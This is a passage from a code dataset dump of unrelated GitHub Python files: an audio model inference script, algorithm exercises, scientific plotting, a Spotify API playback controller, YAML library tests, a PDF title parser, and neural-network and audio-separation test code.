saved_model_path = '../results/sleep_sound_model/class 4/sample'\n saved_model = tf.saved_model.load(saved_model_path)\n\n for test_data in dataset.to_numpy():\n filename = test_data[0]\n label = int(test_data[2])\n wav = load_wav_16k_mono(filename)\n model_result = saved_model(wav)\n pred = tf.argmax(model_result).numpy()\n\n if label == pred:\n true += 1\n flag = \"true\"\n else:\n false += 1\n flag = \"false\"\n\n filename = \"/\".join(filename.split(\"/\")[-2:])\n new.write(filename + \",\" + map_classes[label] + \",\" + map_classes[pred] + \",\" + flag + \"\\n\")\n\n accuracy = true/(true+false)*100\n print(f\"Test Accuracy: {accuracy}%\")\n new.write(\"\\n\")\n new.write(\"\\n\")\n new.write(\"result,\" + str(accuracy) + \"%\\n\")\n\n new.close()\n","repo_name":"AllyHyeseongKim/Sleep-Stage-Classification","sub_path":"certificate/inference.py","file_name":"inference.py","file_ext":"py","file_size_in_byte":1326,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"38"} +{"seq_id":"72707420271","text":"from itertools import zip_longest\nfrom collections import defaultdict\n\ndef isAnagram(s: str, t: str) -> bool:\n count = defaultdict(int)\n for i, j in zip_longest(s, t):\n count[i] += 1\n count[j] -= 1\n\n return all(not i for i in count.values())\n\nprint(isAnagram(\"a\", \"ab\"))\n# print(isAnagram(\"anagram\", \"nagaram\"))\n","repo_name":"antidoid/DSA","sub_path":"problems/242.py","file_name":"242.py","file_ext":"py","file_size_in_byte":335,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"14260274719","text":"from pathlib import Path\nimport plot_and_process_utils as ppu\nimport os\nimport matplotlib.pyplot as plt\nimport numpy as np\n\n\nimport matplotlib.pylab as pylab\nprint(pylab.rcParams.keys())\nparams = { 'axes.labelsize':18,\n 'axes.titlesize':20,\n 'figure.titlesize':20,\n 'xtick.labelsize':14,\n 'ytick.labelsize':14}\npylab.rcParams.update(params)\n\n\ndbin_path = Path(str(os.getcwd())).parent.parent / 'dbins'\n\nprint(dbin_path.absolute())\n\ndbin_fnames = [\n '1al1-sf_paper_qcorrel',\n '1cos-sf_paper_qcorrel',\n# '4osd-sf_paper_qcorrel'\n]\n\nqmaxs = [0.3699, 0.3699]\n\n\nnQ = 256\nnTheta =360\n\ntmax =180\n\n\n\nfor dbin_fname, qmax in zip(dbin_fnames, qmaxs):\n t_space = np.linspace(0,tmax, nTheta)\n q_space = np.linspace(0,qmax, nQ)\n\n tscale, qscale = np.meshgrid(t_space, q_space)\n try:\n qvol = ppu.read_dbin(str(dbin_path/f'{dbin_fname}'), nQ, nTheta)\n except FileNotFoundError:\n print(f'File {dbin_fname} Not Found: Skipping')\n continue\n\n\n \n\n\n r1r2 = ppu.extract_r1r2(qvol)\n\n\n r1r2 = r1r2**(0.25)\n \n r1r2 = ppu.convolve_gaussian(r1r2, 2,2)\n\n r1r2 -= np.min(r1r2)\n r1r2 /= np.max(r1r2)\n\n # ppu.plot_map(r1r2,aspect='auto', title=f'{dbin_fname[:4].upper()} - $q$ Space Correlation',\n # extent=[0,tmax,0,qmax], xlabel='$\\\\theta$ / $ ^{\\circ}$',fig_size=(8,5.5), \n # ylabel='$q_1=q_2$ / $\\AA^{-1}$', save=f'{dbin_fname[:4]}_q1q2_rv' , cmap='viridis')\n plt.figure(figsize=(8,5.5), dpi=100)\n plt.suptitle(f'{dbin_fname[:4].upper()} - $q$ Space Correlation')\n ax1 = plt.subplot(2,2,3)\n\n plt.imshow(r1r2, cmap='viridis', aspect='auto', extent=[0,tmax,0,qmax], origin='lower')\n plt.xlim(0,180)\n plt.ylim(0, qmax)\n\n # plt.title(f'{dbin_fname[:4].upper()} - $q$ Space Correlation')\n plt.xlabel('$\\\\theta$ / $ ^{\\circ}$')\n plt.ylabel('$q_1=q_2$ / $\\AA^{-1}$')\n\n ax2 = plt.subplot(2,2,4)\n # ax2.set_title('Mean Inten.($q$)')\n plt.plot(np.average(r1r2,axis=1), q_space)\n plt.ylim([0, qmax])\n plt.xlim([0, np.max(np.average(r1r2,axis=1))])\n # plt.gca().invert_yaxis()\n # plt.gca().invert_xaxis()\n\n # plt.xlabel('$q_1=q_2$ / $\\AA^{-1}$')\n plt.xticks([])\n plt.yticks([])\n plt.xlabel('Mean Inten.($q$)')\n\n\n ax2 = plt.subplot(2,2,1)\n # ax2.set_title('Mean Inten.($\\\\theta$)')\n plt.plot(t_space, np.average(r1r2,axis=0))\n plt.xlim([0, 180])\n plt.ylim([0, np.max(np.average(r1r2,axis=0))])\n\n # plt.xlabel('$\\\\theta$ / $ ^{\\circ}$')\n plt.xticks([])\n plt.yticks([])\n plt.subplots_adjust(wspace=0,\n hspace=0.0)\n plt.ylabel('Mean Inten.($\\\\theta$)')\n\n\n\n # plt.colorbar()\n plt.savefig(f'{dbin_fname[:4]}_q1q2_rv' )\n\n\n# plt.plot(t_space, 3.5175*t_space**(-1.038291), 'r,')\n\n \n\nplt.show()\n\n","repo_name":"YellowSub17/qcorrel","sub_path":"plotting/paper_plots/q1q2_revis.py","file_name":"q1q2_revis.py","file_ext":"py","file_size_in_byte":2800,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"40600813736","text":"class Solution:\n def validMountainArray(self, A):\n \"\"\"\n :type A: List[int]\n :rtype: bool\n \"\"\"\n lenA = len(A)\n if lenA <= 2:\n return False\n\n max_pos = A.index(max(A))\n if max_pos == 0 or max_pos == lenA - 1:\n return False\n\n left, right = A[0:max_pos], A[max_pos:lenA]\n if sorted(list(set(left))) == left and sorted(list(set(right))) == right[::-1]: \n return True\n\n return False\n \t\n \n# A = [2,1]\n# A = [3,5,5]\n# A = [0,3,2,1]\n# A = [1,7,9,5,4,1,2]\nA = [4,20,32,45,49,45,31,21,20,16,11,8]\ns = Solution()\nr = s.validMountainArray(A)\nprint(r)\n ","repo_name":"Rosevil1874/LeetCode-Solution-Python-Java","sub_path":"Python-Solution/941_Valid-Mountain-Array/941.py","file_name":"941.py","file_ext":"py","file_size_in_byte":670,"program_lang":"python","lang":"en","doc_type":"code","stars":48,"dataset":"github-code","pt":"38"} +{"seq_id":"35007596269","text":"from datetime import datetime, timedelta\nfrom spotify_secrets import DEVICE_ID, CLIENT_ID, CLIENT_SECRET, REFRESH_TOKEN\nimport requests\n\n# Methods (available to use):\n# RETURN VALUES\n# ERROR: returns \"ERROR\" or \"CONNECTION_ERROR\n# NO ERROR: returns \"SUCCESS\"\n\n# starts/resumes the playback\n# start_playback()\n\n# pauses the playback\n# pause_playback()\n\n# skips to the next song and plays it\n# skip_playback()\n\n# goes back to a previous song and plays it\n# previous_playback()\n\n# return playing status of device\n# is_playing()\n\n# Change playback volume \n# paramter: increment - signed int {change volume by the increment value}\n# change_volume(increment):\n\nclass _Helper:\n # Token info storage\n access_token = None\n token_expiration = None\n\n # Return header info for API calls\n @staticmethod\n def get_headers():\n return {\n 'Authorization': f\"Bearer {_Helper.access_token}\"\n }\n \n # Return header info for Volume calls \n @staticmethod\n def get_volume_header():\n return {\n 'Accept': 'application/json',\n 'Content-Type': 'application/json',\n 'Authorization': f\"Bearer {_Helper.access_token}\",\n }\n \n # Return DEVICE_ID in a json\n @staticmethod\n def get_device_json():\n return {\n 'device_ids': [\n f'{DEVICE_ID}',\n ],\n }\n \n # Return DEVICE_ID in a json\n @staticmethod\n def set_volume_json(new_vol):\n return {\n 'volume_percent' : f\"{new_vol}\",\n 'device_id' : f'{DEVICE_ID}',\n }\n \nclass _SpotifyConstants:\n # URL endpoint for API calls\n TOKEN_ENDPOINT = \"https://accounts.spotify.com/api/token\"\n DEFAULT_URL = \"https://api.spotify.com/v1/me/player\"\n DEVICES_ENDPOINT = f\"{DEFAULT_URL}/devices\"\n START_PLAYBACK_ENDPOINT = f\"{DEFAULT_URL}/play?{DEVICE_ID}\"\n PAUSE_PLAYBACK_ENDPOINT = f\"{DEFAULT_URL}/pause?{DEVICE_ID}\"\n SKIP_TO_NEXT_ENDPOINT = f\"{DEFAULT_URL}/next?{DEVICE_ID}\"\n SKIP_TO_PREVIOUS_ENDPOINT = f\"{DEFAULT_URL}/previous?{DEVICE_ID}\"\n VOLUME_ENDPOINT = f\"{DEFAULT_URL}/volume?{DEVICE_ID}\"\n\n # Standard return values\n # For status codes other than 200 and 201\n ERROR = 'ERROR' \n CONNECTION_ERROR = 'CONNECTION_ERROR'\n SUCCESS = 'SUCCESS'\n\n# Refresh Token\ndef __refresh_token(bypass_check=False):\n # Check if refresh is necessary\n if (_Helper.token_expiration and not bypass_check):\n # If current time is still under expiration time, no need to refresh token\n if (datetime.now() < _Helper.token_expiration):\n return _SpotifyConstants.SUCCESS\n # Otherwise, refresh token\n # Generate aspects of API call\n payload = {\n 'grant_type': 'refresh_token',\n 'refresh_token': f'{REFRESH_TOKEN}',\n 'client_id': f'{CLIENT_ID}',\n 'client_secret': f'{CLIENT_SECRET}'\n }\n headers = {'Content-Type': 'application/x-www-form-urlencoded'}\n\n # Make API call\n try:\n response = requests.post(_SpotifyConstants.TOKEN_ENDPOINT, headers=headers, data=payload)\n except:\n return _SpotifyConstants.CONNECTION_ERROR\n \n # Check API response\n if response and response.status_code == 200:\n json_data = response.json()\n if (json_data and 'access_token' in json_data and 'expires_in' in json_data):\n _Helper.access_token = json_data['access_token']\n _Helper.token_expiration = datetime.now() + timedelta(seconds = int(json_data['expires_in'])-10)\n return _SpotifyConstants.SUCCESS\n else:\n return _SpotifyConstants.ERROR\n else:\n None\n\n# Start Playback (private)\ndef __start_playback():\n # Check token\n __refresh_token()\n\n # Generate aspects of API call\n headers = _Helper.get_headers()\n \n # set device to be active if it is not via API call\n set_active_device = __get_device_info()\n if set_active_device:\n error_status = __set_active_device()\n if error_status in [_SpotifyConstants.ERROR, _SpotifyConstants.CONNECTION_ERROR]:\n return error_status\n \n # Make API call\n try:\n response = requests.put(_SpotifyConstants.START_PLAYBACK_ENDPOINT, headers=headers, data={})\n except:\n return _SpotifyConstants.CONNECTION_ERROR\n \n # Check API response\n if (response.status_code == 202):\n return _SpotifyConstants.SUCCESS\n else:\n return _SpotifyConstants.ERROR\n\n# Pause Playback (private)\ndef __pause_playback():\n # Check token\n __refresh_token()\n\n # Generate aspects of API call\n headers = _Helper.get_headers()\n \n # Make API call\n try:\n response = requests.put(_SpotifyConstants.PAUSE_PLAYBACK_ENDPOINT , headers=headers, data={})\n except:\n return _SpotifyConstants.CONNECTION_ERROR\n \n # Check API response\n if (response.status_code == 202):\n return _SpotifyConstants.SUCCESS\n else:\n return _SpotifyConstants.ERROR\n\n# Skip Playback (private)\ndef __skip_playback():\n # Check token\n __refresh_token()\n\n # Generate aspects of API call\n headers = _Helper.get_headers()\n \n # Make API call\n try:\n response = requests.post(_SpotifyConstants.SKIP_TO_NEXT_ENDPOINT, headers=headers, data={})\n except:\n return _SpotifyConstants.CONNECTION_ERROR\n \n # Check API response\n if (response.status_code == 202):\n return _SpotifyConstants.SUCCESS\n else:\n return _SpotifyConstants.ERROR\n\n# Previous Playback (private)\ndef __previous_playback():\n # Check token\n __refresh_token()\n\n # Generate aspects of API call\n headers = _Helper.get_headers()\n \n # Make API call\n try:\n response = requests.post(_SpotifyConstants.SKIP_TO_PREVIOUS_ENDPOINT, headers=headers, data={})\n except:\n return _SpotifyConstants.CONNECTION_ERROR\n \n # Check API response\n if (response.status_code == 202):\n return _SpotifyConstants.SUCCESS\n else:\n return _SpotifyConstants.ERROR\n \n# return playing status of device\ndef __is_playing():\n # Check token\n __refresh_token()\n\n # Generate aspects of API call\n headers = _Helper.get_headers()\n \n # Make API call\n try:\n response = requests.get(f'{_SpotifyConstants.DEFAULT_URL}', headers=headers)\n except:\n return _SpotifyConstants.CONNECTION_ERROR\n \n if (response.status_code == 200): \n return response.json()['is_playing']\n else:\n return _SpotifyConstants.ERROR\n \n# return state of is_playing something\ndef __change_volume(change_volume_by):\n # Check token\n __refresh_token()\n\n # Generate aspects of API call\n headers = _Helper.get_headers()\n \n _ , current_volume = __get_device_info()\n current_volume += change_volume_by\n \n # Make API call\n try:\n response = requests.put(f'{_SpotifyConstants.VOLUME_ENDPOINT}', headers=headers, params=_Helper.set_volume_json(current_volume))\n except:\n return _SpotifyConstants.CONNECTION_ERROR\n \n if (response.status_code == 204): \n return _SpotifyConstants.SUCCESS\n else:\n return _SpotifyConstants.ERROR\n\n# returns \"is_active\" state and \"volume_percent\" of raspberry pi device (private)\ndef __get_device_info():\n # Check token\n __refresh_token()\n\n # Generate aspects of API call\n headers = _Helper.get_headers()\n \n # Make API call\n try:\n response = requests.get(f'{_SpotifyConstants.DEVICES_ENDPOINT}', headers=headers)\n except:\n return _SpotifyConstants.CONNECTION_ERROR\n \n transfer_playback = False\n if (response.status_code == 200): \n for device in response.json()['devices']:\n # raspberry pi found\n if device['id'] == DEVICE_ID:\n if not device['is_active']:\n transfer_playback = True\n break\n \n return transfer_playback, device['volume_percent']\n else:\n return _SpotifyConstants.ERROR\n \n# sets the raspberry pi to be the active device (private)\ndef __set_active_device():\n # Check token\n __refresh_token()\n\n # Generate aspects of API call\n headers = _Helper.get_headers()\n \n # Make API call\n try:\n response = requests.put(_SpotifyConstants.DEFAULT_URL, headers=headers, json=_Helper.get_device_json())\n except:\n return _SpotifyConstants.CONNECTION_ERROR\n \n # Check API response\n if (response.status_code == 202):\n return _SpotifyConstants.SUCCESS\n else:\n return _SpotifyConstants.ERROR\n\n# Start Playback (public)\ndef start_playback():\n return __start_playback()\n\n# Pause Playback (public)\ndef pause_playback():\n return __pause_playback()\n\n# Skip Playback (public)\ndef skip_playback():\n return __skip_playback()\n\n# Previous Playback (public)\ndef previous_playback():\n return __previous_playback()\n\n# See if something is playing (public) \ndef is_playing():\n return __is_playing()\n\n# Change playback volume by a certain increment (public) \ndef change_volume(change_volume_by):\n return __change_volume(change_volume_by)\n","repo_name":"Zracano/Gesture-Recognition","sub_path":"spotify.py","file_name":"spotify.py","file_ext":"py","file_size_in_byte":9135,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"38997299513","text":"import tensorflow as tf\r\nfrom tensorflow import keras\r\nimport numpy as np\r\nimport matplotlib.pyplot as plt\r\nfrom tensorflow.keras.datasets import mnist #kerasとtensor.kerasは異なる\r\n(traindata, trainlabel), (testdata, testlabel) = mnist.load_data() #ここでkengo/.keras/data/mnistがあるかどうかチェックする\r\n\r\nprint(traindata.shape) # 60000×28×28\r\nprint(testdata.shape) # 10000×28×28\r\n\r\n# # 一つの画像を表示\r\n# plt.contourf(traindata[0], cmap='gray')\r\n# plt.show()\r\n\r\nplt.figure(figsize=(10,10))\r\nfor i in range(25):\r\n plt.subplot(5,5,i+1)\r\n plt.xticks([])\r\n plt.yticks([])\r\n plt.grid(False)\r\n plt.imshow(traindata[i], cmap=plt.cm.binary)\r\n plt.xlabel(trainlabel[i])\r\nplt.show()","repo_name":"kennmasa28/for_share","sub_path":"TensorFlow/01_ClassifyImage/T0_show_mnist.py","file_name":"T0_show_mnist.py","file_ext":"py","file_size_in_byte":728,"program_lang":"python","lang":"ja","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"31680916375","text":"import math\nN = int(input())\nres=0\nfor n in range(N):\n\ta, b = [int(i) for i in input().split()]\n\ttemp = math.sqrt(a**2+b**2)\n\tif temp > res:\n\t\tres = temp\n\t\nprint('{:.2f}'.format(res))","repo_name":"Shanyao-HEU/PTA-PAT","sub_path":"pat-b/1063.py","file_name":"1063.py","file_ext":"py","file_size_in_byte":183,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"38"} +{"seq_id":"18119916149","text":"from collections import OrderedDict\nfrom types import GeneratorType\n\nimport pytest\nfrom yaml.constructor import ConstructorError\nfrom yaml.representer import RepresenterError\n\nimport oyaml as yaml\nfrom oyaml import _std_dict_is_order_preserving\n\n\ndata = OrderedDict([(\"x\", 1), (\"z\", 3), (\"y\", 2)])\n\n\ndef test_dump():\n assert yaml.dump(data, default_flow_style=None) == \"{x: 1, z: 3, y: 2}\\n\"\n\n\ndef test_safe_dump():\n assert yaml.safe_dump(data, default_flow_style=None) == \"{x: 1, z: 3, y: 2}\\n\"\n\n\ndef test_dump_all():\n assert (\n yaml.dump_all(documents=[data, {}], default_flow_style=None)\n == \"{x: 1, z: 3, y: 2}\\n--- {}\\n\"\n )\n\n\ndef test_dump_and_safe_dump_match():\n mydict = {\"x\": 1, \"z\": 2, \"y\": 3}\n # don't know if mydict is ordered in the implementation or not (but don't care)\n assert yaml.dump(mydict) == yaml.safe_dump(mydict)\n\n\ndef test_safe_dump_all():\n assert (\n yaml.safe_dump_all(documents=[data, {}], default_flow_style=None)\n == \"{x: 1, z: 3, y: 2}\\n--- {}\\n\"\n )\n\n\ndef test_load():\n loaded = yaml.safe_load(\"{x: 1, z: 3, y: 2}\")\n assert loaded == {\"x\": 1, \"z\": 3, \"y\": 2}\n\n\ndef test_safe_load():\n loaded = yaml.safe_load(\"{x: 1, z: 3, y: 2}\")\n assert loaded == {\"x\": 1, \"z\": 3, \"y\": 2}\n\n\ndef test_load_all():\n gen = yaml.safe_load_all(\"{x: 1, z: 3, y: 2}\\n--- {}\\n\")\n assert isinstance(gen, GeneratorType)\n ordered_data, empty_dict = gen\n assert empty_dict == {}\n assert ordered_data == data\n\n\n@pytest.mark.skipif(_std_dict_is_order_preserving, reason=\"requires old dict impl\")\ndef test_loads_to_ordered_dict():\n loaded = yaml.safe_load(\"{x: 1, z: 3, y: 2}\")\n assert isinstance(loaded, OrderedDict)\n\n\n@pytest.mark.skipif(not _std_dict_is_order_preserving, reason=\"requires new dict impl\")\ndef test_loads_to_std_dict():\n loaded = yaml.safe_load(\"{x: 1, z: 3, y: 2}\")\n assert not isinstance(loaded, OrderedDict)\n assert isinstance(loaded, dict)\n\n\n@pytest.mark.skipif(_std_dict_is_order_preserving, reason=\"requires old dict impl\")\ndef test_safe_loads_to_ordered_dict():\n loaded = yaml.safe_load(\"{x: 1, z: 3, y: 2}\")\n assert isinstance(loaded, OrderedDict)\n\n\n@pytest.mark.skipif(not _std_dict_is_order_preserving, reason=\"requires new dict impl\")\ndef test_safe_loads_to_std_dict():\n loaded = yaml.safe_load(\"{x: 1, z: 3, y: 2}\")\n assert not isinstance(loaded, OrderedDict)\n assert isinstance(loaded, dict)\n\n\nclass MyOrderedDict(OrderedDict):\n pass\n\n\ndef test_subclass_dump():\n data = MyOrderedDict([(\"x\", 1), (\"y\", 2)])\n assert \"!!python/object/apply:test_oyaml.MyOrderedDict\" in yaml.dump(data)\n with pytest.raises(RepresenterError, match=\"cannot represent an object\"):\n yaml.safe_dump(data)\n\n\ndef test_anchors_and_references():\n text = \"\"\"\n defaults:\n all: &all\n product: foo\n development: &development\n <<: *all\n profile: bar\n\n development:\n platform:\n <<: *development\n host: baz\n \"\"\"\n expected_load = {\n \"defaults\": {\n \"all\": {\"product\": \"foo\"},\n \"development\": {\"product\": \"foo\", \"profile\": \"bar\"},\n },\n \"development\": {\n \"platform\": {\"host\": \"baz\", \"product\": \"foo\", \"profile\": \"bar\"}\n },\n }\n assert yaml.safe_load(text) == expected_load\n\n\ndef test_omap():\n text = \"\"\"\n Bestiary: !!omap\n - aardvark: African pig-like ant eater. Ugly.\n - anteater: South-American ant eater. Two species.\n - anaconda: South-American constrictor snake. Scaly.\n \"\"\"\n expected_load = {\n \"Bestiary\": (\n [\n (\"aardvark\", \"African pig-like ant eater. Ugly.\"),\n (\"anteater\", \"South-American ant eater. Two species.\"),\n (\"anaconda\", \"South-American constrictor snake. Scaly.\"),\n ]\n )\n }\n assert yaml.safe_load(text) == expected_load\n\n\ndef test_omap_flow_style():\n text = \"Numbers: !!omap [ one: 1, two: 2, three : 3 ]\"\n expected_load = {\"Numbers\": ([(\"one\", 1), (\"two\", 2), (\"three\", 3)])}\n assert yaml.safe_load(text) == expected_load\n\n\ndef test_merge():\n text = \"\"\"\n - &CENTER { x: 1, y: 2 }\n - &LEFT { x: 0, y: 2 }\n - &BIG { r: 10 }\n - &SMALL { r: 1 }\n \n # All the following maps are equal:\n \n - # Explicit keys\n x: 1\n y: 2\n r: 10\n label: center/big\n \n - # Merge one map\n << : *CENTER\n r: 10\n label: center/big\n \n - # Merge multiple maps\n << : [ *CENTER, *BIG ]\n label: center/big\n \n - # Override\n << : [ *BIG, *LEFT, *SMALL ]\n x: 1\n label: center/big\n \"\"\"\n data = yaml.safe_load(text)\n assert len(data) == 8\n center, left, big, small, map1, map2, map3, map4 = data\n assert center == {\"x\": 1, \"y\": 2}\n assert left == {\"x\": 0, \"y\": 2}\n assert big == {\"r\": 10}\n assert small == {\"r\": 1}\n expected = {\"x\": 1, \"y\": 2, \"r\": 10, \"label\": \"center/big\"}\n assert map1 == expected\n assert map2 == expected\n assert map3 == expected\n assert map4 == expected\n\n\ndef test_unhashable_error_context():\n with pytest.raises(ConstructorError, match=r\".*line.*column.*\"):\n yaml.safe_load(\"{foo: bar}: baz\")\n\n\n@pytest.mark.skipif(not hasattr(yaml, \"CSafeLoader\"), reason=\"requires cyaml loaders\")\ndef test_explicit_loader():\n data = yaml.load(\"{x: 1, z: 3, y: 2}\", Loader=yaml.CSafeLoader)\n assert data == {\"x\": 1, \"z\": 3, \"y\": 2}\n assert list(data) == [\"x\", \"z\", \"y\"]\n\n\n@pytest.mark.skipif(not hasattr(yaml, \"CSafeDumper\"), reason=\"requires cyaml dumpers\")\ndef test_explicit_dumper():\n data = OrderedDict([(\"x\", 1), (\"z\", 3), (\"y\", 2)])\n text = yaml.dump(data, Dumper=yaml.CSafeDumper, default_flow_style=None)\n assert text == \"{x: 1, z: 3, y: 2}\\n\"\n","repo_name":"wimglenn/oyaml","sub_path":"test_oyaml.py","file_name":"test_oyaml.py","file_ext":"py","file_size_in_byte":5943,"program_lang":"python","lang":"en","doc_type":"code","stars":162,"dataset":"github-code","pt":"38"} +{"seq_id":"11538965648","text":"import os\nfrom PIL import Image\nfrom skimage import io\nimport ANN\n\npath = r\"C:\\Users\\user\\PycharmProjects\\image_hamming\\DATA\"\n\n\ndef CreateModel(pathToImages, nameToSaveModel, sizeVer, sizeHor ):\n model = ANN.BuildANNModel( pathToImages, sizeVer, sizeHor, use_flip=False, use_rotate=False, extend_flag=False)\n model.save(nameToSaveModel)\n\n\ndef UseModel(modelName, fromRange, toRange, pathToSave ):\n ( savedModel, savedImagesNumber, verSize, horSize, layersNum) = ANN.LoadANNModel(modelName) # savedModel = load_model(modelName)\n for i in range(fromRange, toRange + 1):\n Y = ANN.ApplyANNModel( savedModel, i, verSize, horSize )\n img = Image.fromarray(Y.astype('uint8'))\n img.convert('RGB').save(pathToSave + \"\\img_\" + str(i) + \".png\")\n\n\ndef ReverseModel( modelName, imagesPath ):\n ( savedModel, savedImagesNumber, verSize, horSize, layersNum ) = ANN.LoadANNModel(modelName)\n fileNames = os.listdir(imagesPath)\n for fn in fileNames:\n img = io.imread( imagesPath + \"\\\\\" + fn )\n ( ind, binInd ) = ANN.FindInANNModel( savedModel, img )\n print( \"( ind, bin ) = ( \" + str(ind) + \"; \" + str(binInd) + \" ) ==> fName = \" + os.path.basename(fn) )\n\n # for i in range(fromRange, toRange):\n # img = io.imread(imagesPath + \"\\img_\" + str(i) + \".png\")\n # ind = find(img, savedModel)\n # print(\"i = \" + str(i) + \"; IND = \" + str(ind))\n\n\nif __name__ == \"__main__\":\n modelName = path + \"\\gfgModel.h5\"\n frVerSize = 591\n frHorSize = 781\n\n # ------ создание\n print(\"\\n ************* CreateModel *************** \")\n #CreateModel(path + \"\\IN\", modelName, frVerSize, frHorSize )\n #\n #\n # # ----- использование\n print(\"\\n ************* UseModel *************** \")\n #UseModel(modelName, 0, 255, path + \"\\OUT\")\n\n # ------ реверс\n print(\"\\n ************* ReverseModel *************** \")\n ReverseModel(modelName, path + \"\\OUT\" )\n","repo_name":"SD6399/image_hamming","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1990,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"22473624728","text":"import sys\nfrom pdfminer.high_level import extract_pages\nfrom pdfminer.layout import LTTextContainer, LTLine, LTChar\n\n#this module contains one public method to parse the title of a typical PDF academic paper, given its filepath\n#the parsing often fails because of difficulty in parsing PDF files\n\ndef getTitle(filepath):\n \"\"\"main method to extract the title of a pdf file\"\"\"\n \n try:\n filepath = filepath.strip()\n except TypeError:\n print(\"filepath not a string\")\n \n if not filepath[len(filepath)-4:len(filepath)].lower() == \".pdf\":\n sys.exit(\"filepath not ending with .pdf in \" + filepath)\n \n try:\n data = extractFirstPageElements(filepath)\n texts = data[0]\n fonts = data[1]\n \n maxFontPos = extractTitlePos(fonts)\n uncleanedTitle = extractTitle(texts, maxFontPos)\n title = cleanTitle(uncleanedTitle)\n \n except: #mostly due to IndexError as no texts are read in due to unreadable file or blank page, or some readTexts-fontSize mismatch\n title = \"Unknown\"\n\n if len(title) > 120: #ultra-long title likely error\n title = \"Unknown\" \n \n return title\n\n\ndef extractFirstPageElements(filepath):\n \"\"\"helper method to extract text elements and their corresponding font sizes into lists\"\"\"\n\n fonts = []\n elements = []\n for page in extract_pages(filepath):\n for element in page:\n if isinstance(element, LTTextContainer):\n for text_line in element:\n for character in text_line:\n if isinstance(character, LTChar):\n font_size = character.size\n break #first character only, assuming others in text_line have the same size\n fonts.append(font_size)\n elements.append(element.get_text())\n break #read first page only\n return [elements, fonts]\n\n\ndef extractTitlePos(fonts):\n \"\"\"helper method to extract the positions having the largest font size\"\"\"\n font_pos = []\n maxFont = max(fonts)\n for pos, size in enumerate(fonts):\n if size == maxFont:\n font_pos.append(pos)\n return font_pos\n\n\ndef extractTitle(elements, positions):\n \"\"\"helper method to extract those elements having the largest font size, then return as a joint string\"\"\"\n title = []\n for i in positions:\n title.append(elements[i])\n return \" \".join(title)\n\n\ndef cleanTitle(title):\n \"\"\"helper method to clean the title by removing \\n and illegal filename symbols\"\"\"\n \n englishArticles = (\"a\", \"an\", \"the\") #to remove if start word of title\n \n title = title.strip() #remove whitespaces\n title = title.replace(\"\\n\", \" \") #remove any inline \\n\n title = title.replace(\":\", \" -\") #replace invalid file : symbol\n title = title.replace(\"?\", \" \") #replace invalid file ? symbol\n title = title.replace(\"*\", \"\") #replace invalid symbol\n title = title.replace(\"@\", \"\") #replace invalid symbol\n title = title.replace(\"/\", \" \") #replace invalid symbol\n title = title.replace(\" \", \" \") #remove potential double whitespaces\n title = title.title() #capitalize each word\n \n #remove starting article if one\n firstWord = title.split()[0].lower() #first word of title\n if firstWord in englishArticles:\n secondWord = title.split()[1] #second word of title\n secondWordPos = title.index(secondWord) #where second word starts\n title = title[secondWordPos:] #remove the starting article off title\n\n #perform word capitalization, some keywords are all lower-case, some words are all upper-case, regular words are letter-capitalized\n words = title.split() #individual words in the title, each letter-capitalized\n lowercaseWords = (\"a\", \"an\", \"the\", \"at\", \"to\", \"from\", \"for\", \"using\", \"of\", \"among\", \"across\", \"during\",\"what\", \"with\", \"and\", \"or\", \"between\", \"in\", \"on\", \"is\", \"are\", \"as\", \"there\", \"under\", \"toward\", \"towards\", \"through\", \"via\", \"by\", \"based\", \"vs\", \"versus\", \"its\", \"it\", \"their\")\n uppercaseWords = (\"us\", \"usa\", \"eu\", \"uk\", \"hk\", \"nyse\", \"ftse\", \"hkse\", \"pca\", \"etf\", \"etfs\", \"fx\", \"ipo\", \"hft\", \"spx\", \"vix\", \"vxx\", \"adr\", \"adrs\")\n capAdjustedWords = []\n for word in words: #check each word one by one\n if word.lower() in lowercaseWords:\n capAdjustedWords.append(word.lower())\n elif word.lower() in uppercaseWords:\n capAdjustedWords.append(word.upper())\n else:\n capAdjustedWords.append(word)\n if capAdjustedWords[0].islower():\n capAdjustedWords[0] = capAdjustedWords[0].capitalize() #captailize in case first word is in lowercaseWords\n title = \" \".join(capAdjustedWords)\n\n #often the final char is some special character so should be removed\n finalChar = title[ len(title)-1 : ]\n if not finalChar.isalnum():\n title = title[0 : len(title)-1] #remove the last char\n \n \n return title\n\n\nif __name__ == \"__main__\":\n filepath = input(\"Enter the file path (using /): \")\n print(getTitle(filepath))\n","repo_name":"feribg/deanstreetlab.github.io","sub_path":"papers/py/titleParser.py","file_name":"titleParser.py","file_ext":"py","file_size_in_byte":5080,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"5585401313","text":"#!/usr/bin/env python\n\nimport unittest\n\nimport os\nimport numpy as np\nimport scipy.io.wavfile as wavfile\nfrom py2shpss import py2shpss\nfrom py2shpss.HPSS import HPSS\nfrom py2shpss import metric\n\nclass TestObjDecrease(unittest.TestCase):\n here = os.path.dirname(os.path.abspath(__file__))\n wavpath = os.path.abspath(here + \"/../sampleSounds/doremi.wav\")\n fft_sizes = [128, 384, 1024]\n q = [0.001, 0.1, 100]\n\n def test_hm21_obj_decrease(self):\n # load sig\n sr, sig = wavfile.read(self.wavpath)\n self.assertEqual(sr, 8000)\n \n for fft_size in self.fft_sizes:\n # stft\n amp, phase = py2shpss.STFT(fft_size).STFT(sig)\n # hpss\n hpss = HPSS(mode='hm21', eval_obj=True, iter=100)\n _, _, obj = hpss(amp)\n # check loss\n loss = [np.sum(_) for _ in obj]\n for x, y in zip(loss[:-1], loss[1:]):\n self.assertGreaterEqual(x, y)\n\n def test_idiv_obj_decrease(self):\n # load sig\n sr, sig = wavfile.read(self.wavpath)\n self.assertEqual(sr, 8000)\n \n for fft_size in self.fft_sizes:\n for q in self.q:\n # stft\n amp, phase = py2shpss.STFT(fft_size).STFT(sig)\n # hpss\n qH = 